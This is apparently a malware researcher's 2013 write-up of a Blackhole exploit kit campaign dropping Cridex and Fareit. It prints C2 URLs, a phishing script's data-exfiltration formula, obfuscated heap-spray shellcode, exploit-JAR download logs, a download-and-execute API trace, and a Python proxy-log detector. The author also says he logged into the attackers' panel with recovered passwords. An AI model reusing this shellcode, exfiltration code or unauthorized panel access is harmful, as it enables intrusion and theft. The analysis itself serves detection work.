To the remote hosts below:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php

With the PoC I detected below (screenshot), be noted the usage of the below USER-AGENT:
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

The Control and Center Trails
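The command-and-control trails on this page can be turned directly into proxy-log checks: the Cridex callbacks go to bare IP addresses on port 8080 with the fake "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" user-agent, the Fareit credential upload is a POST to /asp/intro.php with the "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" user-agent, and the phishing script reports to the panel's gate.php with bid= and rkey= parameters. As an added example, not code from the original post, here is a Python scanner that applies those three checks to a constructed pipe-delimited proxy log; the log format and the client addresses are constructed, the indicator values are the ones quoted in the post.

```python
import re
from urllib.parse import urlparse, parse_qs

# User-agent strings hardcoded in the two binaries, as quoted in the post
CRIDEX_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
FAREIT_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"

IPV4_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def classify(method, url, user_agent):
    """Return the indicator names that one proxied request matches."""
    hits = []
    u = urlparse(url)
    host = u.hostname or ""
    port = u.port or (443 if u.scheme == "https" else 80)
    bare_ip = bool(IPV4_HOST.match(host))
    # Cridex callback: bare-IP host on :8080 with the fake MSIE 7.0 UA
    if user_agent == CRIDEX_UA and bare_ip and port == 8080:
        hits.append("cridex-callback")
    # Fareit credential upload: POST to /asp/intro.php with the MSIE 5.0 UA
    if user_agent == FAREIT_UA and method == "POST" and u.path.endswith("/asp/intro.php"):
        hits.append("fareit-post")
    # Phishing-kit panel report: gate.php?bid=<pc name>&...&rkey=<random>
    if u.path.endswith("/gate.php"):
        q = parse_qs(u.query)
        if "bid" in q and "rkey" in q:
            hits.append("panel-gate")
    return hits


# Constructed proxy log: timestamp|client|method|url|status|user-agent
SAMPLE_PROXY_LOG = """\
2013-01-16T16:30:01Z|10.0.0.5|GET|http://84.22.100.108:8080/|200|Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
2013-01-16T16:30:02Z|10.0.0.5|GET|http://www.example.com/index.html|200|Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
2013-01-16T16:31:10Z|10.0.0.5|POST|http://132.248.49.112:8080/asp/intro.php|200|Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
2013-01-16T16:32:45Z|10.0.0.5|GET|http://62.76.177.123/if_Career/gate.php?bid=WORKSTATION-7&location=https%3A%2F%2Fbank.example%2Flogin&rkey=0.5821|200|Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
2013-01-16T16:33:00Z|10.0.0.6|GET|http://192.0.2.10:8080/status|200|curl/7.28.0
"""


def scan_log(text):
    """Parse the constructed log and return (timestamp, client, indicator, netloc) alerts."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, ua = line.split("|", 5)
        for name in classify(method, url, ua):
            alerts.append((ts, client, name, urlparse(url).netloc))
    return alerts


if __name__ == "__main__":
    for ts, client, name, netloc in scan_log(SAMPLE_PROXY_LOG):
        print(f"{ts} {client} {name:16s} {netloc}")
```

The last log line (a bare IP on port 8080 contacted by curl) is there to show that the port alone is not the indicator; it is the combination with the hardcoded user-agent that makes the Cridex rule precise.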
It has the trail of an Admin Panel for the bad actors to access:
var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';
which was used to send the phished information with the formula below:
var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']();
In the memory a large combination of passwords for this panel was found; I posted some to the VT comment yesterday:
phpbb asdf qazwsx iloveyou jordan pokemon
qwerty soccer happy shadow faith iloveyo
jesus superman matrix christ summer mustang
abc123 michael pass sunshine ashley helpme
letmein cheese aaaaaa master buster justin
test internet amanda computer heaven jasmine
love joshua nothing princess pepper orange
password1 fuckyou ginger tigger hunter testing
hello blessed mother football lovely apple
monkey baseball snoopy angel andrew michell
dragon starwars jessica jesus1 thomas peace
trustno1 purple welcome whatever angels secret
freedom charlie grace killer daniel william
jennifer :
Frankly, yesterday I happened to test accessing the site with some of the passwords and it worked, but today it looks like it's closed..

Research Materials
Here are the samples -->>[MEDIAFIRE]
Please contact me via Twitter by mentioning @MalwareMustDie for the research data.

Additional: New Infector of dfudont.ru:8080
@unixfreaxjp /malware]$ date
Fri Jan 18 13:44:56 JST 2013

BHEK Landing page/PluginDetect
Downloads:
--10:58:57-- h00p://dfudont.ru:8080/forum/links/column.php
=> `column.php'
Resolving dfudont.ru... 89.111.176.125, 91.224.135.20, 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 117,545 70.64K/s
10:59:01 (70.51 KB/s) - `column.php' saved [117545]

Obfuscated version landing page (screenshot). The deobfuscated version is here -->>[HERE]

Some Changes in dfudont.ru:8080 infection
New shellcode in plugin detect:
function getShellCode(){
var a = "
8282!%5154!%O415!%94eO!%a451!%eOa4!%9134!%c451!%74eO!%2191!%9124!%9121!%21b1!%9134!%3421!%
2191!%b1b1!%a121!%21b1!%9154!%3421!%2191!%a1e5!%d451!%eOO5!%b1b1!%1421!%2191!%9114!%6421!%
2191!%b181!%e451!%71a4!%O485!%6O85!%5464!%44d5!%b474!%b57O!%6434!%4414!%547O!%a5d5!%e474!%
817O!%81O1!%21O1!%a5d5!%c56O!%7464!%d5c4!%c4e4!%7O7O!%8521!%c5c5!%85O4!%237O!%15e1!%eee6!%
:
583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%Ofb2!%423a!%c7cO!%4c7d!%5ae6!%4236!%e43a!%b25f!%
67cO!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c5O2!%O1ad!%6983!%3f72!%deb1!%58b2!%964d!%
1e16!%ddb1!%8Ob2!%3ae5!%dde7!%O5b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%cOda!%fac1!%
d53d!%11e2!%bee6!%8681!%O93a!%7d7d!%d383!%9a6c!%b14O!%b2c5!%6741!%e43a!%b13f!%e5O2!%e73a!%
8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%5O8e!%afbe!%O42e!%O382!%
efO8!%9eeO!%6618!%139c!%O185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("")
:
function getBlockSize(){
return 1024}
function getAllocSize(){
return 1024 * 1024}
function getAllocCount(){
return 300}
function getFillBytes(){
var a = '%u' + '0c0c';
return a + a}

Some new modifications, jar/java callback functions, were spotted in PluginDetect (screenshot). Changes were eventually also detected in the JARs: both jars have the same exploit codes as before; in try1.jar only new obfuscation was detected (screenshot), while in the (ex-)0day jar/try2.jar the MD5 changed (screenshot). The new changed samples' detection ratio in VT: [Landing Page] [JAR1] [JAR2]. First & second JAR during download (snipped log):
--11:01:49-- h00p://dfudont.ru:8080/forum/links/column.php
=> `column.php.1'
Resolving dfudont.ru... seconds 0.00, 89.111.176.125, 91.224.135.20, 212.112.207.15
Caching dfudont.ru => 89.111.176.125 91.224.135.20 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php HTTP/1.0 (older java request)
Host: dfudont.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 02:01:44 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16830
ETag: "571e4f2c6881ced7067423592c3a9958"
Last-Modified: Fri, 18 Jan 2013 02:01:44 GMT
Accept-Ranges: bytes
:
200 OK
Length: 16,830 (16K) [application/java-archive]
11:01:51 (31.60 KB/s) - `try1.jar' saved [16830/16830]
GET /forum/links/column.php HTTP/1.0 (newer java request)
Host: dfudont.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Fri, 18 Jan 2013 02:08:09 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22824
ETag: "1bfec3a52c1b19ee4aaaba0be551c1f1"
Last-Modified: Fri, 18 Jan 2013 02:02:52 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,824 (22K) [application/java-archive]
11:02:59 (35.13 KB/s) - `try2.jar' saved [22824/22824]

How about the payload?
It is the same as the original post wrote :-) Cridex that dropped Fareit. PoC: the translated API calls of the shellcode show the URL:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

Download logs (snipped):
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 04:35:44 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Fri, 18 Jan 2013 04:35:44 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
100%[====================================>] 197,632 71.52K/s
13:35:53 (71.40 KB/s) - `calc.exe' saved [197632/197632]

The file:
@unixfreaxjp /malware]$ ls -alF info.exe ; md5 info.exe
-rwxr--r-- 1 MMD toor 197632 Jan 17 01:28 info.exe*
MD5 (info.exe) = f188879d2cc11dae25c6368cd2f4ad96

I guess these moronz didn't have enough time to make a new payload, eh? :-) Tick.. tock.. tick.. tock...

Samples
For research/education about malware & to increase detection rates, we are sharing the samples here -->>[MEDIAFIRE]